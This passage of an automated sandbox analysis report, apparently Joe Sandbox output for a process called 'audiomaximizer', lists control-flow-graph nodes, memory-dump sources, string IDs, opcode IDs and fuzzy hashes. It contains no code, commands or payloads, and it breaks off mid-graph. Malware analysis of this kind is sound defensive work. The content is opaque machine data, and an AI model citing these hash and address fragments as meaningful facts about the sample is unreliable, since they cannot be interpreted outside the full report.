                                                                                                                                                                                • Instruction ID: 4c3e408e7fc603c1e2a2b0d2705037524e203d4f0e6e87bd6368b50b45023cb7
                                                                                                                                                                                • Opcode Fuzzy Hash: 70089153dd1d558c0dc86954f2023b427e4d08d3cfb305c7b31e3cd1f3fcaddd
                                                                                                                                                                                • Instruction Fuzzy Hash: 1CA1C974E00218DFDB14DFAAD984A9DBBF2FF89300F14816AE409AB365DB359946CF50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 324 168ccd8-168cd08 325 168cd0a 324->325 326 168cd0f-168cdec call 16841a0 call 1683cc0 324->326 325->326 336 168cdee 326->336 337 168cdf3-168ce14 call 1685658 326->337 336->337 339 168ce19-168ce24 337->339 340 168ce2b-168ce2f 339->340 341 168ce26 339->341 342 168ce31-168ce32 340->342 343 168ce34-168ce3b 340->343 341->340 344 168ce53-168ce97 342->344 345 168ce3d 343->345 346 168ce42-168ce50 343->346 350 168cefd-168cf14 344->350 345->346 346->344 352 168ce99-168ceaf 350->352 353 168cf16-168cf3b 350->353 357 168ced9 352->357 358 168ceb1-168cebd 352->358 360 168cf3d-168cf52 353->360 361 168cf53 353->361 359 168cedf-168cefc 357->359 362 168cebf-168cec5 358->362 363 168cec7-168cecd 358->363 359->350 360->361 364 168ced7 362->364 363->364 364->359
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                • API String ID: 0-1487592376
                                                                                                                                                                                • Opcode ID: 734266224da8d03839948ae65b6757df6eed513dad4beef8f9efd6da1508ebc1
                                                                                                                                                                                • Instruction ID: 8335bf6fbfff6d233f0b57114eb489f770a7ae42fb702b07fc756463e43dcd8c
                                                                                                                                                                                • Opcode Fuzzy Hash: 734266224da8d03839948ae65b6757df6eed513dad4beef8f9efd6da1508ebc1
                                                                                                                                                                                • Instruction Fuzzy Hash: D881A274E00218DFDB14DFAAD984A9DBBF2BF88300F14C169E419AB365DB349985CF50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 368 168c468-168c498 369 168c49a 368->369 370 168c49f-168c57c call 16841a0 call 1683cc0 368->370 369->370 380 168c57e 370->380 381 168c583-168c5a4 call 1685658 370->381 380->381 383 168c5a9-168c5b4 381->383 384 168c5bb-168c5bf 383->384 385 168c5b6 383->385 386 168c5c1-168c5c2 384->386 387 168c5c4-168c5cb 384->387 385->384 388 168c5e3-168c627 386->388 389 168c5cd 387->389 390 168c5d2-168c5e0 387->390 394 168c68d-168c6a4 388->394 389->390 390->388 396 168c629-168c63f 394->396 397 168c6a6-168c6cb 394->397 401 168c669 396->401 402 168c641-168c64d 396->402 406 168c6cd-168c6e2 397->406 407 168c6e3 397->407 405 168c66f-168c68c 401->405 403 168c64f-168c655 402->403 404 168c657-168c65d 402->404 408 168c667 403->408 404->408 405->394 406->407 408->405
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                • API String ID: 0-1487592376
                                                                                                                                                                                • Opcode ID: 96cced1fab01acdeb48aa5f66650c16d8cc0a904e2b667c3a708e4fea15287bf
                                                                                                                                                                                • Instruction ID: 17b782cfcb73b9035eb8371c45c776db1cbcad71dc3796525c7015d1411ec030
                                                                                                                                                                                • Opcode Fuzzy Hash: 96cced1fab01acdeb48aa5f66650c16d8cc0a904e2b667c3a708e4fea15287bf
                                                                                                                                                                                • Instruction Fuzzy Hash: 0481A574E00218CFDB14DFAAD984A9DBBF2BF88304F14D16AE419AB365DB349981CF51

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 412 1685370-16853a0 413 16853a2 412->413 414 16853a7-1685484 call 16841a0 call 1683cc0 412->414 413->414 424 168548b-16854a9 414->424 425 1685486 414->425 455 16854ac call 1685658 424->455 456 16854ac call 1685649 424->456 425->424 426 16854b2-16854bd 427 16854bf 426->427 428 16854c4-16854c8 426->428 427->428 429 16854ca-16854cb 428->429 430 16854cd-16854d4 428->430 431 16854ec-1685530 429->431 432 16854db-16854e9 430->432 433 16854d6 430->433 437 1685596-16855ad 431->437 432->431 433->432 439 16855af-16855d4 437->439 440 1685532-1685548 437->440 446 16855ec 439->446 447 16855d6-16855eb 439->447 443 168554a-1685556 440->443 444 1685572 440->444 448 1685558-168555e 443->448 449 1685560-1685566 443->449 450 1685578-1685595 444->450 447->446 451 1685570 448->451 449->451 450->437 451->450 455->426 456->426
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                • API String ID: 0-1487592376
                                                                                                                                                                                • Opcode ID: 8fcd8b8542963a45473733e64fc6023f5e32987ac4aebbee9bb237750cae8c5a
                                                                                                                                                                                • Instruction ID: 299b2f9efd4b4d6a094b99624b4f7069e4b12408976bd444643cc78fde1de639
                                                                                                                                                                                • Opcode Fuzzy Hash: 8fcd8b8542963a45473733e64fc6023f5e32987ac4aebbee9bb237750cae8c5a
                                                                                                                                                                                • Instruction Fuzzy Hash: 0981B274E01218DFDB14DFAAD984A9DBBF2BF88300F14C169E809AB365DB349985CF51

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 457 168c738-168c768 458 168c76a 457->458 459 168c76f-168c84c call 16841a0 call 1683cc0 457->459 458->459 469 168c84e 459->469 470 168c853-168c874 call 1685658 459->470 469->470 472 168c879-168c884 470->472 473 168c88b-168c88f 472->473 474 168c886 472->474 475 168c891-168c892 473->475 476 168c894-168c89b 473->476 474->473 477 168c8b3-168c8f7 475->477 478 168c89d 476->478 479 168c8a2-168c8b0 476->479 483 168c95d-168c974 477->483 478->479 479->477 485 168c8f9-168c90f 483->485 486 168c976-168c99b 483->486 490 168c939 485->490 491 168c911-168c91d 485->491 492 168c99d-168c9b2 486->492 493 168c9b3 486->493 496 168c93f-168c95c 490->496 494 168c91f-168c925 491->494 495 168c927-168c92d 491->495 492->493 497 168c937 494->497 495->497 496->483 497->496
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                • API String ID: 0-1487592376
                                                                                                                                                                                • Opcode ID: a7af342a1ba78265aab9f797e18b03440688d9d16d63d90c422b8163115a6f63
                                                                                                                                                                                • Instruction ID: 0617931008f531ea7362309c9c082bb32fb72adb31840d88b7663bff6294f4af
                                                                                                                                                                                • Opcode Fuzzy Hash: a7af342a1ba78265aab9f797e18b03440688d9d16d63d90c422b8163115a6f63
                                                                                                                                                                                • Instruction Fuzzy Hash: 6781B474E00218CFDB14DFAAD984A9DBBF2BF88310F14D16AE419AB365DB349985CF50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 545 168d278-168d2a8 546 168d2aa 545->546 547 168d2af-168d38c call 16841a0 call 1683cc0 545->547 546->547 557 168d38e 547->557 558 168d393-168d3b4 call 1685658 547->558 557->558 560 168d3b9-168d3c4 558->560 561 168d3cb-168d3cf 560->561 562 168d3c6 560->562 563 168d3d1-168d3d2 561->563 564 168d3d4-168d3db 561->564 562->561 565 168d3f3-168d437 563->565 566 168d3dd 564->566 567 168d3e2-168d3f0 564->567 571 168d49d-168d4b4 565->571 566->567 567->565 573 168d439-168d44f 571->573 574 168d4b6-168d4db 571->574 578 168d479 573->578 579 168d451-168d45d 573->579 580 168d4dd-168d4f2 574->580 581 168d4f3 574->581 584 168d47f-168d49c 578->584 582 168d45f-168d465 579->582 583 168d467-168d46d 579->583 580->581 585 168d477 582->585 583->585 584->571 585->584
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                • API String ID: 0-1487592376
                                                                                                                                                                                • Opcode ID: 9ac6c1a27e172df93441ac08902a4bd838783cc8930a835bfea13b5933fbeb3d
                                                                                                                                                                                • Instruction ID: 65ac6012bcb3d4f1a8172f54aed39342356314fe142b08f6d694fce83d860ecb
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ac6c1a27e172df93441ac08902a4bd838783cc8930a835bfea13b5933fbeb3d
                                                                                                                                                                                • Instruction Fuzzy Hash: 0581C374E01218DFDB14DFAAD984A9DBBF2BF89300F14C169E419AB365DB34A981CF50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 501 168cfa9-168cfd8 502 168cfda 501->502 503 168cfdf-168d0bc call 16841a0 call 1683cc0 501->503 502->503 513 168d0be 503->513 514 168d0c3-168d0e4 call 1685658 503->514 513->514 516 168d0e9-168d0f4 514->516 517 168d0fb-168d0ff 516->517 518 168d0f6 516->518 519 168d101-168d102 517->519 520 168d104-168d10b 517->520 518->517 521 168d123-168d167 519->521 522 168d10d 520->522 523 168d112-168d120 520->523 527 168d1cd-168d1e4 521->527 522->523 523->521 529 168d169-168d17f 527->529 530 168d1e6-168d20b 527->530 534 168d1a9 529->534 535 168d181-168d18d 529->535 536 168d20d-168d222 530->536 537 168d223 530->537 540 168d1af-168d1cc 534->540 538 168d18f-168d195 535->538 539 168d197-168d19d 535->539 536->537 541 168d1a7 538->541 539->541 540->527 541->540
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                • API String ID: 0-1487592376
                                                                                                                                                                                • Opcode ID: 03d4ad3f4415f8f2bb930f41365c99ac65f7528e060f1c9bd87150066a796327
                                                                                                                                                                                • Instruction ID: 284cfb672eaf7f90281bcd3ef983eadd52585f6541e70eb8bd3a3c29a5b5c381
                                                                                                                                                                                • Opcode Fuzzy Hash: 03d4ad3f4415f8f2bb930f41365c99ac65f7528e060f1c9bd87150066a796327
                                                                                                                                                                                • Instruction Fuzzy Hash: 6581B274E00218CFDB54DFAAD984A9DBBF2BF88300F14C169E859AB365DB349985CF50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 589 168ca08-168ca38 590 168ca3a 589->590 591 168ca3f-168cb1c call 16841a0 call 1683cc0 589->591 590->591 601 168cb1e 591->601 602 168cb23-168cb44 call 1685658 591->602 601->602 604 168cb49-168cb54 602->604 605 168cb5b-168cb5f 604->605 606 168cb56 604->606 607 168cb61-168cb62 605->607 608 168cb64-168cb6b 605->608 606->605 609 168cb83-168cbc7 607->609 610 168cb6d 608->610 611 168cb72-168cb80 608->611 615 168cc2d-168cc44 609->615 610->611 611->609 617 168cbc9-168cbdf 615->617 618 168cc46-168cc6b 615->618 622 168cc09 617->622 623 168cbe1-168cbed 617->623 625 168cc6d-168cc82 618->625 626 168cc83 618->626 624 168cc0f-168cc2c 622->624 627 168cbef-168cbf5 623->627 628 168cbf7-168cbfd 623->628 624->615 625->626 629 168cc07 627->629 628->629 629->624
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                • API String ID: 0-1487592376
                                                                                                                                                                                • Opcode ID: 482ed3300be37c54de31564d104b7ddec5cff9972356fe8cee20f653174645a4
                                                                                                                                                                                • Instruction ID: b3e6e51572fbd4ccb1f45b63643b6e8171e8c84fbe153e609e6bc693ca67e472
                                                                                                                                                                                • Opcode Fuzzy Hash: 482ed3300be37c54de31564d104b7ddec5cff9972356fe8cee20f653174645a4
                                                                                                                                                                                • Instruction Fuzzy Hash: 0D81B274E00618CFDB14DFAAD994A9DBBF2BF88300F14C169E819AB365DB359981CF50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 633 1686fc8-1686ffe 775 1687000 call 1686fc8 633->775 776 1687000 call 1687118 633->776 777 1687000 call 16869a0 633->777 634 1687006-168700c 635 168705c-1687060 634->635 636 168700e-1687012 634->636 637 1687062-1687071 635->637 638 1687077-168708b 635->638 639 1687021-1687028 636->639 640 1687014-1687019 636->640 641 168709d-16870a7 637->641 642 1687073-1687075 637->642 643 1687093-168709a 638->643 779 168708d call 168a0e8 638->779 780 168708d call 168a088 638->780 781 168708d call 1689dd0 638->781 644 16870fe-168713b 639->644 645 168702e-1687035 639->645 640->639 646 16870a9-16870af 641->646 647 16870b1-16870b5 641->647 642->643 655 168713d-1687143 644->655 656 1687146-1687166 644->656 645->635 648 1687037-168703b 645->648 649 16870bd-16870f7 646->649 647->649 651 16870b7 647->651 652 168704a-1687051 648->652 653 168703d-1687042 648->653 649->644 651->649 652->644 654 1687057-168705a 652->654 653->652 654->643 655->656 662 1687168 656->662 663 168716d-1687174 656->663 664 16874fc-1687505 662->664 665 1687176-1687181 663->665 667 168750d-1687519 665->667 668 1687187-168719a 665->668 674 168751b-1687521 667->674 675 1687583-1687585 667->675 672 168719c-16871aa 668->672 673 16871b0-16871cb 668->673 672->673 682 1687484-168748b 672->682 683 16871cd-16871d3 673->683 684 16871ef-16871f2 673->684 676 168758b-168759a 674->676 677 1687523-1687536 674->677 675->676 678 1687587-1687589 675->678 691 168759c-16875ab 676->691 692 16875e4 676->692 677->675 681 16875e9-16875eb 678->681 682->664 690 168748d-168748f 682->690 688 16871dc-16871df 683->688 689 16871d5 683->689 686 16871f8-16871fb 684->686 687 168734c-1687352 684->687 686->687 695 1687201-1687207 686->695 693 1687358-168735d 687->693 694 168743e-1687441 687->694 696 1687212-1687218 688->696 697 16871e1-16871e4 688->697 689->687 689->688 689->694 689->696 698 168749e-16874a4 690->698 699 1687491-1687496 690->699 691->692 709 16875ad-16875b3 691->709 692->681 693->694 702 1687508 694->702 703 1687447-168744d 694->703 695->687 701 168720d 695->701 704 168721a-168721c 696->704 705 168721e-1687220 696->705 706 16871ea 697->706 707 168727e-1687284 697->707 698->667 700 16874a6-16874ab 698->700 699->698 710 16874ad-16874b2 700->710 711 16874f0-16874f3 700->711 701->694 702->667 713 168744f-1687457 703->713 714 1687472-1687476 703->714 715 168722a-1687233 704->715 705->715 706->694 707->694 712 168728a-1687290 707->712 716 16875b5 709->716 717 16875b7-16875c3 709->717 710->702 718 16874b4 710->718 711->702 725 16874f5-16874fa 711->725 719 1687292-1687294 712->719 720 1687296-1687298 712->720 713->667 721 168745d-168746c 713->721 714->682 724 1687478-168747e 714->724 722 1687235-1687240 715->722 723 1687246-168726e 715->723 726 16875c5-16875de 716->726 717->726 727 16874bb-16874c0 718->727 728 16872a2-16872b9 719->728 720->728 721->673 721->714 722->694 722->723 750 1687362-1687398 723->750 751 1687274-1687279 723->751 724->665 724->682 725->664 725->690 726->692 748 16875e0-16875e2 726->748 730 16874e2-16874e4 727->730 731 16874c2-16874c4 727->731 742 16872bb-16872d4 728->742 743 16872e4-168730b 728->743 730->702 739 16874e6-16874e9 730->739 736 16874d3-16874d9 731->736 737 16874c6-16874cb 731->737 736->667 741 16874db-16874e0 736->741 737->736 739->711 741->730 745 16874b6-16874b9 741->745 742->750 754 16872da-16872df 742->754 743->702 756 1687311-1687314 743->756 745->702 745->727 748->681 757 168739a-168739e 750->757 758 16873a5-16873ad 750->758 751->750 754->750 756->702 759 168731a-1687343 756->759 760 16873bd-16873c1 757->760 761 16873a0-16873a3 757->761 758->702 762 16873b3-16873b8 758->762 759->750 774 1687345-168734a 759->774 763 16873e0-16873e4 760->763 764 16873c3-16873c9 760->764 761->758 761->760 762->694 767 16873ee-168740d call 16876f1 763->767 768 16873e6-16873ec 763->768 764->763 766 16873cb-16873d3 764->766 766->702 769 16873d9-16873de 766->769 771 1687413-1687417 767->771 768->767 768->771 769->694 771->694 772 1687419-1687435 771->772 772->694 774->750 775->634 776->634 777->634 779->643 780->643 781->643
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o^q$(o^q$,bq$,bq
                                                                                                                                                                                • API String ID: 0-879173519
                                                                                                                                                                                • Opcode ID: 74775790d4c2406887e2eaa37219cea96ac6088209c2b62bc38b7ef8b25664a4
                                                                                                                                                                                • Instruction ID: 4a88df002923b2dd4a5d3ba24c06c368a9dff4fc253aa63b79c95ded30961fc0
                                                                                                                                                                                • Opcode Fuzzy Hash: 74775790d4c2406887e2eaa37219cea96ac6088209c2b62bc38b7ef8b25664a4
                                                                                                                                                                                • Instruction Fuzzy Hash: 46125D70A00209CFDB15DF69CC84AADBBF6BF88314F258569E905AB361DB31ED41CB61
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o^q$4'^q
                                                                                                                                                                                • API String ID: 0-273632683
                                                                                                                                                                                • Opcode ID: e5ccccce35d0f11fd6368852cd9aeca1f3321f78bb4cf1de25968356931a5be5
                                                                                                                                                                                • Instruction ID: 0aa14986c785a7aca7a9ea9514d5eca5261fbdad873fb9829ca74ff723713b2a
                                                                                                                                                                                • Opcode Fuzzy Hash: e5ccccce35d0f11fd6368852cd9aeca1f3321f78bb4cf1de25968356931a5be5
                                                                                                                                                                                • Instruction Fuzzy Hash: 83827031600209DFCB15DFA8C984AAEBBF2FF88310F15865AE9459B366D730ED91CB51
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o^q$Hbq
                                                                                                                                                                                • API String ID: 0-662517225
                                                                                                                                                                                • Opcode ID: 2b3006f73a1e11bdd5b5e66362704a8436095b752384bc6e0c9496dd2a974a20
                                                                                                                                                                                • Instruction ID: 0f72a44aacadfc71e463518904b2184cc306d93f5a8f2d6bf32b0db050098945
                                                                                                                                                                                • Opcode Fuzzy Hash: 2b3006f73a1e11bdd5b5e66362704a8436095b752384bc6e0c9496dd2a974a20
                                                                                                                                                                                • Instruction Fuzzy Hash: DF127E71A002199FDB15DF69CC54AAEBBF6FF88300F248569E905AB395DB309D42CB90
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Xbq$$^q
                                                                                                                                                                                • API String ID: 0-1593437937
                                                                                                                                                                                • Opcode ID: 04e90b1d1fe51f217d4d8140e6437244ad7dc191a0e32e5b4594285588c5ed35
                                                                                                                                                                                • Instruction ID: 2366f3a5d25fe2c27ecf01ea7249fceb96ad6f99b81c12847a273a80f737c8a4
                                                                                                                                                                                • Opcode Fuzzy Hash: 04e90b1d1fe51f217d4d8140e6437244ad7dc191a0e32e5b4594285588c5ed35
                                                                                                                                                                                • Instruction Fuzzy Hash: 67F13E74E04209DFDB18EFB9D8546AEBBB2FF88310B14866DE406A7354DF359802CB95
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4176023569.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_6ed0000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1941d6aa464c336a984a4585033b58a79791a9053b5b2ce149acd58d98331db0
                                                                                                                                                                                • Instruction ID: a8071ee6d5afd1ccd82c6f418c4eb6a7b96164adf1977e265e8b5c569d730850
                                                                                                                                                                                • Opcode Fuzzy Hash: 1941d6aa464c336a984a4585033b58a79791a9053b5b2ce149acd58d98331db0
                                                                                                                                                                                • Instruction Fuzzy Hash: 9ED19D74E01218CFDB54DFA5D994B9DBBB2FB88300F2091A9D418AB3A4DB359E81CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3215ee5f27189888d563ef36ffce7e7e518108852a85eda26fcdf804e7866550
                                                                                                                                                                                • Instruction ID: 34b22acca7aff25bd88e3e76b3afacb5d79f2e0baf973aa5ae17f2a1574b3bc8
                                                                                                                                                                                • Opcode Fuzzy Hash: 3215ee5f27189888d563ef36ffce7e7e518108852a85eda26fcdf804e7866550
                                                                                                                                                                                • Instruction Fuzzy Hash: 16519674E00208DFDB18DFAAD994A9DBBB2FF88300F24C129E815AB365DB359945CF54
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1f5855b673c8afdb1c8b2c2c898998c45d9cda3fd963c433f4c3067a04d0b88f
                                                                                                                                                                                • Instruction ID: 7f9c15553fcc78afb58cffeac49fcddf6eaf2553c68b6fb6acde9208bd311ceb
                                                                                                                                                                                • Opcode Fuzzy Hash: 1f5855b673c8afdb1c8b2c2c898998c45d9cda3fd963c433f4c3067a04d0b88f
                                                                                                                                                                                • Instruction Fuzzy Hash: B6519474E00208DFDB18DFAAD984A9DBBB2FF88300F248529E815AB364DB359945CF54
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4176023569.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_6ed0000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bef334deff7756f8f1dc3baef4c52870f504ccb7c27a9e4d37533acff812e948
                                                                                                                                                                                • Instruction ID: 3e9316ccf61f86c61b4051e2bf221031e7f470dc8c99c15e7907553c31e834da
                                                                                                                                                                                • Opcode Fuzzy Hash: bef334deff7756f8f1dc3baef4c52870f504ccb7c27a9e4d37533acff812e948
                                                                                                                                                                                • Instruction Fuzzy Hash: 0D4104B0E002188BDB58DFAAD8446EEBBF2BF89304F10D02AD418BB254EB345942CF50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 16876f1-1687725 1 168772b-168774e 0->1 2 1687b54-1687b58 0->2 11 16877fc-1687800 1->11 12 1687754-1687761 1->12 3 1687b5a-1687b6e 2->3 4 1687b71-1687b7f 2->4 9 1687bf0-1687c05 4->9 10 1687b81-1687b96 4->10 18 1687c0c-1687c19 9->18 19 1687c07-1687c0a 9->19 20 1687b98-1687b9b 10->20 21 1687b9d-1687baa 10->21 15 1687848-1687851 11->15 16 1687802-1687810 11->16 24 1687770 12->24 25 1687763-168776e 12->25 22 1687c67 15->22 23 1687857-1687861 15->23 16->15 36 1687812-168782d 16->36 26 1687c1b-1687c56 18->26 19->26 27 1687bac-1687bed 20->27 21->27 30 1687c6c-1687c9c 22->30 23->2 28 1687867-1687870 23->28 31 1687772-1687774 24->31 25->31 76 1687c5d-1687c64 26->76 34 168787f-168788b 28->34 35 1687872-1687877 28->35 63 1687c9e-1687cb4 30->63 64 1687cb5-1687cbc 30->64 31->11 38 168777a-16877dc 31->38 34->30 41 1687891-1687897 34->41 35->34 57 168783b 36->57 58 168782f-1687839 36->58 87 16877de 38->87 88 16877e2-16877f9 38->88 42 168789d-16878ad 41->42 43 1687b3e-1687b42 41->43 55 16878af-16878bf 42->55 56 16878c1-16878c3 42->56 43->22 47 1687b48-1687b4e 43->47 47->2 47->28 61 16878c6-16878cc 55->61 56->61 62 168783d-168783f 57->62 58->62 61->43 69 16878d2-16878e1 61->69 62->15 70 1687841 62->70 72 168798f-16879ba call 1687538 * 2 69->72 73 16878e7 69->73 70->15 93 16879c0-16879c4 72->93 94 1687aa4-1687abe 72->94 78 16878ea-16878fb 73->78 78->30 80 1687901-1687913 78->80 80->30 83 1687919-1687931 80->83 145 1687933 call 16880d8 83->145 146 1687933 call 16880c9 83->146 147 1687933 call 1688065 83->147 86 1687939-1687949 86->43 90 168794f-1687952 86->90 87->88 88->11 91 168795c-168795f 90->91 92 1687954-168795a 90->92 91->22 95 1687965-1687968 91->95 92->91 92->95 93->43 97 16879ca-16879ce 93->97 94->2 112 1687ac4-1687ac8 94->112 100 168796a-168796e 95->100 101 1687970-1687973 95->101 98 16879d0-16879dd 97->98 99 16879f6-16879fc 97->99 115 16879ec 98->115 116 16879df-16879ea 98->116 104 16879fe-1687a02 99->104 105 1687a37-1687a3d 99->105 100->101 103 1687979-168797d 100->103 101->22 101->103 103->22 110 1687983-1687989 103->110 104->105 111 1687a04-1687a0d 104->111 107 1687a49-1687a4f 105->107 108 